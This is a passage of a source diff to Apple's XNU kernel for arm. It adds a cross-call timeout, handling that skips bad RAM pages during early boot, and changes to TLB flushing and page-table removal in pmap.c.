with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include + +OS_OVERLOADABLE +void +counter_add(scalable_counter_t *counter, uint64_t amount) +{ + os_atomic_add(zpercpu_get(*counter), amount, relaxed); +} + +OS_OVERLOADABLE +void +counter_inc(scalable_counter_t *counter) +{ + os_atomic_inc(zpercpu_get(*counter), relaxed); +} + +OS_OVERLOADABLE +void +counter_dec(scalable_counter_t *counter) +{ + os_atomic_dec(zpercpu_get(*counter), relaxed); +} + +/* + * NB: On arm, the preemption disabled implementation is the same as + * the normal implementation. Otherwise we would need to enforce that + * callers never mix the interfaces for the same counter. + */ +OS_OVERLOADABLE +void +counter_add_preemption_disabled(scalable_counter_t *counter, uint64_t amount) +{ + counter_add(counter, amount); +} + +OS_OVERLOADABLE +void +counter_inc_preemption_disabled(scalable_counter_t *counter) +{ + counter_inc(counter); +} + +OS_OVERLOADABLE +void +counter_dec_preemption_disabled(scalable_counter_t *counter) +{ + counter_dec(counter); +} diff --git a/osfmk/arm/cpu_capabilities.h b/osfmk/arm/cpu_capabilities.h index 738e94f02..dc5d2d20e 100644 --- a/osfmk/arm/cpu_capabilities.h +++ b/osfmk/arm/cpu_capabilities.h @@ -158,6 +158,10 @@ _Static_assert((_COMM_PAGE64_BASE_ADDRESS >= _COMM_PAGE64_NESTING_START) && "region probably needs to be updated."); #else /* KERNEL_PRIVATE */ +/* + * defines a couple of conveniency macros + * to help read data from the commpage. + */ #define _COMM_PAGE_AREA_LENGTH (4096) #define _COMM_PAGE_BASE_ADDRESS _COMM_PAGE64_BASE_ADDRESS diff --git a/osfmk/arm/cpu_common.c b/osfmk/arm/cpu_common.c index 11ad96d9e..faa3b1e80 100644 --- a/osfmk/arm/cpu_common.c +++ b/osfmk/arm/cpu_common.c @@ -62,13 +62,15 @@ vm_address_t percpu_base_cur; cpu_data_t PERCPU_DATA(cpu_data); cpu_data_entry_t CpuDataEntries[MAX_CPUS]; -static lck_grp_t cpu_lck_grp; -static lck_rw_t cpu_state_lock; +static LCK_GRP_DECLARE(cpu_lck_grp, "cpu_lck_grp"); +static LCK_RW_DECLARE(cpu_state_lock, &cpu_lck_grp); unsigned int real_ncpus = 1; boolean_t idle_enable = FALSE; uint64_t wake_abstime = 0x0ULL; +extern uint64_t xcall_ack_timeout_abstime; + #if defined(HAS_IPI) extern unsigned int gFastIPI; #endif /* defined(HAS_IPI) */ @@ -427,6 +429,11 @@ cpu_signal_internal(cpu_data_t *target_proc, } if ((signal == SIGPxcall) || (signal == SIGPxcallImm)) { + uint64_t start_mabs_time, max_mabs_time, current_mabs_time; + current_mabs_time = start_mabs_time = mach_absolute_time(); + max_mabs_time = xcall_ack_timeout_abstime + current_mabs_time; + assert(max_mabs_time > current_mabs_time); + do { current_signals = target_proc->cpu_signal; if ((current_signals & SIGPdisabled) == SIGPdisabled) { @@ -447,7 +454,20 @@ cpu_signal_internal(cpu_data_t *target_proc, if (!swap_success && (current_proc->cpu_signal & signal)) { cpu_handle_xcall(current_proc); } - } while (!swap_success); + } while (!swap_success && ((current_mabs_time = mach_absolute_time()) < max_mabs_time)); + + /* + * If we time out while waiting for the target CPU to respond, it's possible that no + * other CPU is available to handle the watchdog interrupt that would eventually trigger + * a panic. To prevent this from happening, we just panic here to flag this condition. + */ + if (__improbable(current_mabs_time >= max_mabs_time)) { + uint64_t end_time_ns, xcall_ack_timeout_ns; + absolutetime_to_nanoseconds(current_mabs_time - start_mabs_time, &end_time_ns); + absolutetime_to_nanoseconds(xcall_ack_timeout_abstime, &xcall_ack_timeout_ns); + panic("CPU%u has failed to respond to cross-call after %llu nanoseconds (timeout = %llu ns)", + target_proc->cpu_number, end_time_ns, xcall_ack_timeout_ns); + } if (signal == SIGPxcallImm) { target_proc->cpu_imm_xcall_p0 = p0; @@ -825,13 +845,6 @@ ml_cpu_can_exit(__unused int cpu_id) return false; } -void -ml_cpu_init_state(void) -{ - lck_grp_init(&cpu_lck_grp, "cpu_lck_grp", LCK_GRP_ATTR_NULL); - lck_rw_init(&cpu_state_lock, &cpu_lck_grp, LCK_ATTR_NULL); -} - #ifdef USE_APPLEARMSMP void diff --git a/osfmk/arm/cpu_data_internal.h b/osfmk/arm/cpu_data_internal.h index d9343a0e3..a0648dc3d 100644 --- a/osfmk/arm/cpu_data_internal.h +++ b/osfmk/arm/cpu_data_internal.h @@ -72,7 +72,7 @@ static_assert(sizeof(cpumap_t) * CHAR_BIT >= MAX_CPUS, "cpumap_t bitvector is to #define CPUWINDOWS_BASE (VM_MAX_KERNEL_ADDRESS & CPUWINDOWS_BASE_MASK) #define CPUWINDOWS_TOP (CPUWINDOWS_BASE + (MAX_CPUS * CPUWINDOWS_MAX * ARM_PGBYTES)) -static_assert((CPUWINDOWS_BASE >= VM_MIN_KERNEL_ADDRESS) && (CPUWINDOWS_TOP <= VM_MAX_KERNEL_ADDRESS), +static_assert((CPUWINDOWS_BASE >= VM_MIN_KERNEL_ADDRESS) && ((CPUWINDOWS_TOP - 1) <= VM_MAX_KERNEL_ADDRESS), "CPU copy windows too large for CPUWINDOWS_BASE_MASK value"); typedef struct cpu_data_entry { diff --git a/osfmk/arm/locks_arm.c b/osfmk/arm/locks_arm.c index 98fd21b3a..8246489dc 100644 --- a/osfmk/arm/locks_arm.c +++ b/osfmk/arm/locks_arm.c @@ -512,7 +512,7 @@ lck_spin_init( /* * arm_usimple_lock is a lck_spin_t without a group or attributes */ -void inline +MARK_AS_HIBERNATE_TEXT void inline arm_usimple_lock_init(simple_lock_t lck, __unused unsigned short initial_value) { lck->type = LCK_SPIN_TYPE; diff --git a/osfmk/arm/machine_routines.c b/osfmk/arm/machine_routines.c index 145a783d3..072ed38c2 100644 --- a/osfmk/arm/machine_routines.c +++ b/osfmk/arm/machine_routines.c @@ -166,6 +166,17 @@ ml_init_lock_timeout(void) high_MutexSpin = low_MutexSpin; } +/* + * This is called when all of the ml_processor_info_t structures have been + * initialized and all the processors have been started through processor_start(). + * + * Required by the scheduler subsystem. + */ +void +ml_cpu_init_completed(void) +{ +} + /* * This is called from the machine-independent routine cpu_up() * to perform machine-dependent info updates. diff --git a/osfmk/arm/machine_routines.h b/osfmk/arm/machine_routines.h index 22cb5a66f..ce2d3cb27 100644 --- a/osfmk/arm/machine_routines.h +++ b/osfmk/arm/machine_routines.h @@ -301,9 +301,6 @@ cluster_type_t ml_get_boot_cluster(void); * @field coresight_regs IO-mapped virtual address of CoreSight debug register block. * @field coresight_pa Physical address of CoreSight register block. * @field coresight_len Length of CoreSight register block. - * @field self_ipi_irq AIC IRQ vector for self IPI (cpuX->cpuX). 0 if unsupported. - * @field other_ipi_irq AIC IRQ vector for other IPI (cpuX->cpuY). 0 if unsupported. - * @field pmi_irq AIC IRQ vector for performance management IRQ. 0 if unsupported. * @field die_cluster_id Cluster ID within the local die (EDT: die-cluster-id) * @field cluster_core_id Core ID within the local cluster (EDT: cluster-core-id) */ @@ -327,9 +324,6 @@ typedef struct ml_topology_cpu { vm_offset_t coresight_regs; uint64_t coresight_pa; uint64_t coresight_len; - int self_ipi_irq; - int other_ipi_irq; - int pmi_irq; unsigned int die_cluster_id; unsigned int cluster_core_id; } ml_topology_cpu_t; @@ -683,6 +677,11 @@ uint64_t ml_get_timebase_entropy(void); void ml_init_lock_timeout(void); +#if __arm64__ +uint64_t virtual_timeout_inflate_ns(unsigned int vti, uint64_t timeout); +uint64_t virtual_timeout_inflate_abs(unsigned int vti, uint64_t timeout); +#endif + boolean_t ml_delay_should_spin(uint64_t interval); void ml_delay_on_yield(void); @@ -775,6 +774,7 @@ vm_map_offset_t ml_get_max_offset( #define MACHINE_MAX_OFFSET_DEVICE 0x08 #endif +extern void ml_cpu_init_completed(void); extern void ml_cpu_up(void); extern void ml_cpu_down(void); extern void ml_arm_sleep(void); diff --git a/osfmk/arm/machine_routines_apple.c b/osfmk/arm/machine_routines_apple.c index 0c5617c30..18031f83b 100644 --- a/osfmk/arm/machine_routines_apple.c +++ b/osfmk/arm/machine_routines_apple.c @@ -56,12 +56,20 @@ configure_misc_apple_regs(void) #endif /* __arm64__ */ #if HAS_APPLE_PAC + + +/** + * Returns the default ROP key. + */ uint64_t ml_default_rop_pid(void) { return 0; } +/** + * Returns the default JOP key. + */ uint64_t ml_default_jop_pid(void) { diff --git a/osfmk/arm/machine_routines_common.c b/osfmk/arm/machine_routines_common.c index f7fca614b..aa60dd3fe 100644 --- a/osfmk/arm/machine_routines_common.c +++ b/osfmk/arm/machine_routines_common.c @@ -526,6 +526,7 @@ machine_thread_group_init(struct thread_group *tg) data.thread_group_id = thread_group_get_id(tg); data.thread_group_data = thread_group_get_machine_data(tg); data.thread_group_size = thread_group_machine_data_size(); + data.thread_group_flags = thread_group_get_flags(tg); sched_perfcontrol_thread_group_init(&data); } @@ -539,6 +540,7 @@ machine_thread_group_deinit(struct thread_group *tg) data.thread_group_id = thread_group_get_id(tg); data.thread_group_data = thread_group_get_machine_data(tg); data.thread_group_size = thread_group_machine_data_size(); + data.thread_group_flags = thread_group_get_flags(tg); sched_perfcontrol_thread_group_deinit(&data); } diff --git a/osfmk/arm/model_dep.c b/osfmk/arm/model_dep.c index b7cead5fa..053fe3a94 100644 --- a/osfmk/arm/model_dep.c +++ b/osfmk/arm/model_dep.c @@ -1148,6 +1148,10 @@ DebuggerXCall( INTERRUPT_MASKED_DEBUG_START(current_thread()->machine.int_handler_addr, current_thread()->machine.int_type); } +#if defined(__arm64__) + current_thread()->machine.kpcb = NULL; +#endif /* defined(__arm64__) */ + /* Any cleanup for our pushed context should go here */ } diff --git a/osfmk/arm/pmap.c b/osfmk/arm/pmap.c index 4719ce5b8..60eb475d2 100644 --- a/osfmk/arm/pmap.c +++ b/osfmk/arm/pmap.c @@ -130,7 +130,6 @@ extern u_int32_t random(void); /* from */ static bool alloc_asid(pmap_t pmap); static void free_asid(pmap_t pmap); static void flush_mmu_tlb_region_asid_async(vm_offset_t va, size_t length, pmap_t pmap); -static void flush_mmu_tlb_tte_asid_async(vm_offset_t va, pmap_t pmap); static void flush_mmu_tlb_full_asid_async(pmap_t pmap); static pt_entry_t wimg_to_pte(unsigned int wimg); @@ -138,7 +137,6 @@ struct page_table_ops { bool (*alloc_id)(pmap_t pmap); void (*free_id)(pmap_t pmap); void (*flush_tlb_region_async)(vm_offset_t va, size_t length, pmap_t pmap); - void (*flush_tlb_tte_async)(vm_offset_t va, pmap_t pmap); void (*flush_tlb_async)(pmap_t pmap); pt_entry_t (*wimg_to_pte)(unsigned int wimg); }; @@ -148,7 +146,6 @@ static const struct page_table_ops native_pt_ops = .alloc_id = alloc_asid, .free_id = free_asid, .flush_tlb_region_async = flush_mmu_tlb_region_asid_async, - .flush_tlb_tte_async = flush_mmu_tlb_tte_asid_async, .flush_tlb_async = flush_mmu_tlb_full_asid_async, .wimg_to_pte = wimg_to_pte, }; @@ -599,6 +596,12 @@ pt_attr_leaf_xn(__unused const pt_attr_t * const pt_attr) return ARM_PTE_NX; } +static inline uintptr_t +pt_attr_leaf_x(__unused const pt_attr_t * const pt_attr) +{ + return ARM_PTE_PNX; +} + __unused static inline uintptr_t pt_attr_ln_offmask(__unused const pt_attr_t * const pt_attr, unsigned int level) { @@ -861,7 +864,7 @@ struct pmap kernel_pmap_store MARK_AS_PMAP_DATA; SECURITY_READ_ONLY_LATE(pmap_t) kernel_pmap = &kernel_pmap_store; struct vm_object pmap_object_store VM_PAGE_PACKED_ALIGNED; /* store pt pages */ -vm_object_t pmap_object = &pmap_object_store; +SECURITY_READ_ONLY_LATE(vm_object_t) pmap_object = &pmap_object_store; static SECURITY_READ_ONLY_LATE(zone_t) pmap_zone; /* zone of pmap structures */ @@ -1791,6 +1794,7 @@ pmap_ledger_validate(void * ledger) * Trace levels are controlled by a bitmask in which each * level can be enabled/disabled by the (1< 7) /* * The low global vector page is mapped at a fixed alias. @@ -2410,20 +2431,26 @@ const void * __ptrauth_ppl_handler const ppl_handler_table[PMAP_COUNT] = { [PMAP_IS_TRUST_CACHE_LOADED_INDEX] = pmap_is_trust_cache_loaded_internal, [PMAP_LOOKUP_IN_STATIC_TRUST_CACHE_INDEX] = pmap_lookup_in_static_trust_cache_internal, [PMAP_LOOKUP_IN_LOADED_TRUST_CACHES_INDEX] = pmap_lookup_in_loaded_trust_caches_internal, + [PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX] = pmap_set_compilation_service_cdhash_internal, + [PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX] = pmap_match_compilation_service_cdhash_internal, [PMAP_TRIM_INDEX] = pmap_trim_internal, [PMAP_LEDGER_ALLOC_INIT_INDEX] = pmap_ledger_alloc_init_internal, [PMAP_LEDGER_ALLOC_INDEX] = pmap_ledger_alloc_internal, [PMAP_LEDGER_FREE_INDEX] = pmap_ledger_free_internal, -#if HAS_APPLE_PAC && XNU_MONITOR +#if HAS_APPLE_PAC [PMAP_SIGN_USER_PTR] = pmap_sign_user_ptr_internal, [PMAP_AUTH_USER_PTR] = pmap_auth_user_ptr_internal, -#endif /* HAS_APPLE_PAC && XNU_MONITOR */ +#endif /* HAS_APPLE_PAC */ #if __ARM_RANGE_TLBI__ [PHYS_ATTRIBUTE_CLEAR_RANGE_INDEX] = phys_attribute_clear_range_internal, #endif /* __ARM_RANGE_TLBI__ */ #if __has_feature(ptrauth_calls) && defined(XNU_TARGET_OS_OSX) [PMAP_DISABLE_USER_JOP_INDEX] = pmap_disable_user_jop_internal, #endif /* __has_feature(ptrauth_calls) && defined(XNU_TARGET_OS_OSX) */ + +#if DEVELOPMENT || DEBUG + [PMAP_TEST_TEXT_CORRUPTION_INDEX] = pmap_test_text_corruption_internal, +#endif /* DEVELOPMENT || DEBUG */ }; #endif @@ -2528,6 +2555,64 @@ pmap_get_cpu_data(void) return pmap_cpu_data; } +#if __arm64__ +/* + * Disable interrupts and return previous state. + * + * The PPL has its own interrupt state facility separately from + * ml_set_interrupts_enable(), since that function is not part of the + * PPL, and so doing things like manipulating untrusted data and + * taking ASTs. + * + * @return The previous interrupt state, to be restored with + * pmap_interrupts_restore(). + */ +static uint64_t __attribute__((warn_unused_result)) __used +pmap_interrupts_disable(void) +{ + uint64_t state = __builtin_arm_rsr64("DAIF"); + + if ((state & DAIF_STANDARD_DISABLE) != DAIF_STANDARD_DISABLE) { + __builtin_arm_wsr64("DAIFSet", DAIFSC_STANDARD_DISABLE); + } + + return state; +} + +/* + * Restore previous interrupt state. + * + * @param state The previous interrupt state to restore. + */ +static void __used +pmap_interrupts_restore(uint64_t state) +{ + // no unknown bits? + assert((state & ~DAIF_ALL) == 0); + + if (state != DAIF_STANDARD_DISABLE) { + __builtin_arm_wsr64("DAIF", state); + } +} + +/* + * Query interrupt state. + * + * ml_get_interrupts_enabled() is safe enough at the time of writing + * this comment, but because it is not considered part of the PPL, so + * could change without notice, and because it presently only checks + * DAIF_IRQ, we have our own version. + * + * @return true if interrupts are enable (not fully disabled). + */ + +static bool __attribute__((warn_unused_result)) __used +pmap_interrupts_enabled(void) +{ + return (__builtin_arm_rsr64("DAIF") & DAIF_STANDARD_DISABLE) != DAIF_STANDARD_DISABLE; +} +#endif /* __arm64__ */ + #if XNU_MONITOR /* * pmap_set_range_xprr_perm takes a range (specified using start and end) that @@ -2786,14 +2871,12 @@ pmap_pages_reclaim( pmap_simple_unlock(&pt_pages_lock); return (pmap_paddr_t)0; } else { - int remove_count = 0; bool need_strong_sync = false; vm_map_address_t va; pmap_t pmap; pt_entry_t *bpte, *epte; pt_entry_t *pte_p; tt_entry_t *tte_p; - uint32_t rmv_spte = 0; pmap_simple_unlock(&pt_pages_lock); pmap = ptdp->pmap; @@ -2828,25 +2911,19 @@ pmap_pages_reclaim( * which could cause the counter to drift * more and more. */ - remove_count += pmap_remove_range_options( - pmap, va, bpte, epte, - &rmv_spte, &need_strong_sync, PMAP_OPTIONS_REMOVE); + pmap_remove_range_options( + pmap, va, bpte, epte, NULL, + &need_strong_sync, PMAP_OPTIONS_REMOVE); if (ptd_get_info(ptdp, pte_p)->refcnt != 0) { panic("%s: ptdp %p, count %d", __FUNCTION__, ptdp, ptd_get_info(ptdp, pte_p)->refcnt); } - pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr)); - - if (remove_count > 0) { - pmap_get_pt_ops(pmap)->flush_tlb_region_async(va, (size_t)pt_attr_leaf_table_size(pt_attr), pmap); - } else { - pmap_get_pt_ops(pmap)->flush_tlb_tte_async(va, pmap); - } + pmap_tte_deallocate(pmap, va, va + (size_t)pt_attr_leaf_table_size(pt_attr), need_strong_sync, + tte_p, pt_attr_twig_level(pt_attr)); } } // Undo the lock we grabbed when we found ptdp above pmap_unlock(pmap); - pmap_sync_tlb(need_strong_sync); } pmap_simple_lock(&pmap_pages_lock); } @@ -3259,21 +3336,22 @@ pmap_pages_free( pmap_paddr_t pa, unsigned size) { - pmap_simple_lock(&pmap_pages_lock); - - if (pmap_pages_request_count != 0) { + if (__improbable(pmap_pages_request_count != 0)) { page_free_entry_t *page_entry; - pmap_pages_request_count--; - page_entry = (page_free_entry_t *)phystokv(pa); - page_entry->next = pmap_pages_reclaim_list; - pmap_pages_reclaim_list = page_entry; - pmap_simple_unlock(&pmap_pages_lock); + pmap_simple_lock(&pmap_pages_lock); - return; - } + if (pmap_pages_request_count != 0) { + pmap_pages_request_count--; + page_entry = (page_free_entry_t *)phystokv(pa); + page_entry->next = pmap_pages_reclaim_list; + pmap_pages_reclaim_list = page_entry; + pmap_simple_unlock(&pmap_pages_lock); + return; + } - pmap_simple_unlock(&pmap_pages_lock); + pmap_simple_unlock(&pmap_pages_lock); + } #if XNU_MONITOR (void)size; @@ -5045,10 +5123,178 @@ pmap_virtual_region( return ret; } +/* + * Routines to track and allocate physical pages during early boot. + * On most systems that memory runs from first_avail through to avail_end + * with no gaps. + * + * However if the system supports ECC and bad_ram_pages_count > 0, we + * need to be careful and skip those pages. + */ +static unsigned int avail_page_count = 0; +static bool need_ram_ranges_init = true; + +#if defined(__arm64__) +pmap_paddr_t *bad_ram_pages = NULL; +unsigned int bad_ram_pages_count = 0; + +/* + * We use this sub-range of bad_ram_pages for pmap_next_page() + */ +static pmap_paddr_t *skip_pages; +static unsigned int skip_pages_count = 0; + +#define MAX_BAD_RAM_PAGE_COUNT 64 +static pmap_paddr_t bad_ram_pages_arr[MAX_BAD_RAM_PAGE_COUNT]; + +/* + * XXX - temporary code to get the bad pages array from boot-args. + * expects a comma separated list of offsets from the start + * of physical memory to be considered bad. + * + * HERE JOE -- will eventually be replaced by data provided by iboot + */ +static void +parse_bad_ram_pages_boot_arg(void) +{ + char buf[256] = {0}; + char *s = buf; + char *end; + int count = 0; + pmap_paddr_t num; + extern uint64_t strtouq(const char *, char **, int); + + if (!PE_parse_boot_arg_str("bad_ram_pages", buf, sizeof(buf))) { + goto done; + } + + while (*s && count < MAX_BAD_RAM_PAGE_COUNT) { + num = (pmap_paddr_t)strtouq(s, &end, 0); + if (num == 0) { + break; + } + num &= ~PAGE_MASK; + + bad_ram_pages_arr[count++] = gDramBase + num; + + if (*end != ',') { + break; + } + + s = end + 1; + } + +done: + bad_ram_pages = bad_ram_pages_arr; + bad_ram_pages_count = count; +} + +/* + * Comparison routine for qsort of array of physical addresses. + */ +static int +pmap_paddr_cmp(void *a, void *b) +{ + pmap_paddr_t *x = a; + pmap_paddr_t *y = b; + if (*x < *y) { + return -1; + } + return *x > *y; +} +#endif /* defined(__arm64__) */ + +/* + * Look up ppn in the sorted bad_ram_pages array. + */ +bool +pmap_is_bad_ram(__unused ppnum_t ppn) +{ +#if defined(__arm64__) + pmap_paddr_t pa = ptoa(ppn); + int low = 0; + int high = bad_ram_pages_count - 1; + int mid; + + while (low <= high) { + mid = (low + high) / 2; + if (bad_ram_pages[mid] < pa) { + low = mid + 1; + } else if (bad_ram_pages[mid] > pa) { + high = mid - 1; + } else { + return true; + } + } +#endif /* defined(__arm64__) */ + return false; +} + +/* + * Initialize the count of available pages. If we have bad_ram_pages, then sort the list of them. + * No lock needed here, as this code is called while kernel boot up is single threaded. + */ +static void +initialize_ram_ranges(void) +{ + pmap_paddr_t first = first_avail; + pmap_paddr_t end = avail_end; + + assert(first <= end); + assert(first == (first & ~PAGE_MASK)); + assert(end == (end & ~PAGE_MASK)); + avail_page_count = atop(end - first); + +#if defined(__arm64__) + /* + * XXX Temporary code for testing, until there is iboot support + * + * Parse a list of known bad pages from a boot-args. + */ + parse_bad_ram_pages_boot_arg(); + + /* + * Sort and filter the bad pages list and adjust avail_page_count. + */ + if (bad_ram_pages_count != 0) { + qsort(bad_ram_pages, bad_ram_pages_count, sizeof(*bad_ram_pages), (cmpfunc_t)pmap_paddr_cmp); + skip_pages = bad_ram_pages; + skip_pages_count = bad_ram_pages_count; + + /* ignore any pages before first */ + while (skip_pages_count > 0 && skip_pages[0] < first) { + --skip_pages_count; + ++skip_pages; + } + + /* ignore any pages at or after end */ + while (skip_pages_count > 0 && skip_pages[skip_pages_count - 1] >= end) { + --skip_pages_count; + } + + avail_page_count -= skip_pages_count; + } +#endif /* defined(__arm64__) */ + need_ram_ranges_init = false; +} + unsigned int pmap_free_pages( void) { + if (need_ram_ranges_init) { + initialize_ram_ranges(); + } + return avail_page_count; +} + +unsigned int +pmap_free_pages_span( + void) +{ + if (need_ram_ranges_init) { + initialize_ram_ranges(); + } return (unsigned int)atop(avail_end - first_avail); } @@ -5066,14 +5312,39 @@ boolean_t pmap_next_page( ppnum_t *pnum) { + if (need_ram_ranges_init) { + initialize_ram_ranges(); + } + +#if defined(__arm64__) + /* + * Skip over any known bad pages. + */ + while (skip_pages_count > 0 && first_avail == skip_pages[0]) { + first_avail += PAGE_SIZE; + ++skip_pages; + --skip_pages_count; + } +#endif /* defined(__arm64__) */ + if (first_avail != avail_end) { *pnum = (ppnum_t)atop(first_avail); first_avail += PAGE_SIZE; + assert(avail_page_count > 0); + --avail_page_count; return TRUE; } + assert(avail_page_count == 0); return FALSE; } +void +pmap_retire_page( + __unused ppnum_t pnum) +{ + /* XXX Justin TBD - mark the page as unusable in pmap data structures */ +} + /* * Initialize the pmap module. @@ -5670,7 +5941,7 @@ pmap_deallocate_all_leaf_tts(pmap_t pmap, tt_entry_t * first_ttep, unsigned leve /* Remove the TTE. */ pmap_lock(pmap); - pmap_tte_deallocate(pmap, ttep, level); + pmap_tte_deallocate(pmap, 0, 0, false, ttep, level); pmap_unlock(pmap); } } @@ -5742,7 +6013,7 @@ pmap_destroy_internal( for (i = 0; i < pmap->tte_index_max; i++) { ttep = &pmap->tte[i]; if ((*ttep & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) { - pmap_tte_deallocate(pmap, ttep, PMAP_TT_L1_LEVEL); + pmap_tte_deallocate(pmap, 0, 0, false, ttep, PMAP_TT_L1_LEVEL); } } pmap_unlock(pmap); @@ -6187,12 +6458,18 @@ pmap_tt_deallocate( * must have a refcnt of zero before the TTE can be removed. * * @param pmap The pmap containing the page table whose TTE is being removed. + * @param va_start Beginning of the VA range mapped by the table being removed, for TLB maintenance + * @param va_end Non-inclusive end of the VA range mapped by the table being removed, for TLB maintenance + * @param need_strong_sync Indicates whether strong DSB should be used to synchronize TLB maintenance * @param ttep Pointer to the TTE that should be cleared out. * @param level The level of the page table that contains the TTE to be removed. */ static void pmap_tte_remove( pmap_t pmap, + vm_offset_t va_start, + vm_offset_t va_end, + bool need_strong_sync, tt_entry_t *ttep, unsigned int level) { @@ -6222,6 +6499,17 @@ pmap_tte_remove( *ttep = (tt_entry_t) 0; FLUSH_PTE_STRONG(ttep); #endif /* (__ARM_VMSA__ == 7) */ + // If given a VA range, we're being asked to flush the TLB before the table in ttep is freed. + if (va_end > va_start) { +#if (__ARM_VMSA__ == 7) + // Ensure intermediate translations are flushed for each 1MB block + flush_mmu_tlb_entry_async((va_start & ~ARM_TT_L1_PT_OFFMASK) | (pmap->hw_asid & 0xff)); + flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); + flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + 2 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); + flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + 3 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff)); +#endif + PMAP_UPDATE_TLBS(pmap, va_start, va_end, need_strong_sync); + } } /** @@ -6235,6 +6523,9 @@ pmap_tte_remove( * must have a refcnt of PT_DESC_REFCOUNT in their page table descriptor. * * @param pmap The pmap that owns the page table to be deallocated. + * @param va_start Beginning of the VA range mapped by the table being removed, for TLB maintenance + * @param va_end Non-inclusive end of the VA range mapped by the table being removed, for TLB maintenance + * @param need_strong_sync Indicates whether strong DSB should be used to synchronize TLB maintenance * @param ttep Pointer to the `level` TTE to remove. * @param level The level of the table that contains an entry pointing to the * table to be removed. The deallocated page table will be a @@ -6244,6 +6535,9 @@ pmap_tte_remove( static void pmap_tte_deallocate( pmap_t pmap, + vm_offset_t va_start, + vm_offset_t va_end, + bool need_strong_sync, tt_entry_t *ttep, unsigned int level) { @@ -6261,7 +6555,7 @@ pmap_tte_deallocate( } #endif /* MACH_ASSERT */ - pmap_tte_remove(pmap, ttep, level); + pmap_tte_remove(pmap, va_start, va_end, need_strong_sync, ttep, level); if ((tte & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) { uint64_t pmap_page_size = pt_attr_page_size(pmap_get_pt_attr(pmap)); @@ -6301,19 +6595,17 @@ pmap_tte_deallocate( * entirely within one pte-page. This is NOT checked. * Assumes that the pte-page exists. * - * Returns the number of PTE changed, and sets *rmv_cnt - * to the number of SPTE changed. + * Returns the number of PTE changed */ static int pmap_remove_range( pmap_t pmap, vm_map_address_t va, pt_entry_t *bpte, - pt_entry_t *epte, - uint32_t *rmv_cnt) + pt_entry_t *epte) { bool need_strong_sync = false; - int num_changed = pmap_remove_range_options(pmap, va, bpte, epte, rmv_cnt, + int num_changed = pmap_remove_range_options(pmap, va, bpte, epte, NULL, &need_strong_sync, PMAP_OPTIONS_REMOVE); if (num_changed > 0) { PMAP_UPDATE_TLBS(pmap, va, @@ -6470,11 +6762,12 @@ pmap_remove_range_options( vm_map_address_t va, pt_entry_t *bpte, pt_entry_t *epte, - uint32_t *rmv_cnt, + vm_map_address_t *eva, bool *need_strong_sync __unused, int options) { pt_entry_t *cpte; + size_t npages = 0; int num_removed, num_unwired; int num_pte_changed; int pai = 0; @@ -6482,11 +6775,12 @@ pmap_remove_range_options( int num_external, num_internal, num_reusable; int num_alt_internal; uint64_t num_compressed, num_alt_compressed; + int16_t refcnt = 0; pmap_assert_locked_w(pmap); const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap); - uint64_t pmap_page_size = pt_attr_page_size(pt_attr); + uint64_t pmap_page_size = PAGE_RATIO * pt_attr_page_size(pt_attr); if (__improbable((uintptr_t)epte > (((uintptr_t)bpte + pmap_page_size) & ~(pmap_page_size - 1)))) { panic("%s: PTE range [%p, %p) in pmap %p crosses page table boundary", __func__, bpte, epte, pmap); @@ -6503,10 +6797,18 @@ pmap_remove_range_options( num_alt_compressed = 0; for (cpte = bpte; cpte < epte; - cpte += 1, va += pmap_page_size) { + cpte += PAGE_RATIO, va += pmap_page_size) { pt_entry_t spte; boolean_t managed = FALSE; + /* + * Check for pending preemption on every iteration: the PV list may be arbitrarily long, + * so we need to be as aggressive as possible in checking for preemption when we can. + */ + if (__improbable((eva != NULL) && npages++ && pmap_pending_preemption())) { + *eva = va; + break; + } spte = *((volatile pt_entry_t*)cpte); #if CONFIG_PGTRACE @@ -6539,9 +6841,7 @@ pmap_remove_range_options( * our "compressed" markers, * so let's update it here. */ - if (OSAddAtomic16(-1, (SInt16 *) &(ptep_get_info(cpte)->refcnt)) <= 0) { - panic("pmap_remove_range_options: over-release of ptdp %p for pte %p", ptep_get_ptd(cpte), cpte); - } + --refcnt; spte = *((volatile pt_entry_t*)cpte); } /* @@ -6603,12 +6903,7 @@ pmap_remove_range_options( (pmap != kernel_pmap)) { assertf(!ARM_PTE_IS_COMPRESSED(spte, cpte), "unexpected compressed pte %p (=0x%llx)", cpte, (uint64_t)spte); assertf((spte & ARM_PTE_TYPE_VALID) == ARM_PTE_TYPE, "invalid pte %p (=0x%llx)", cpte, (uint64_t)spte); - if (OSAddAtomic16(-1, (SInt16 *) &(ptep_get_info(cpte)->refcnt)) <= 0) { - panic("pmap_remove_range_options: over-release of ptdp %p for pte %p", ptep_get_ptd(cpte), cpte); - } - if (rmv_cnt) { - (*rmv_cnt)++; - } + --refcnt; } if (pte_is_wired(spte)) { @@ -6636,9 +6931,12 @@ pmap_remove_range_options( * Update the counts */ OSAddAtomic(-num_removed, (SInt32 *) &pmap->stats.resident_count); - pmap_ledger_debit(pmap, 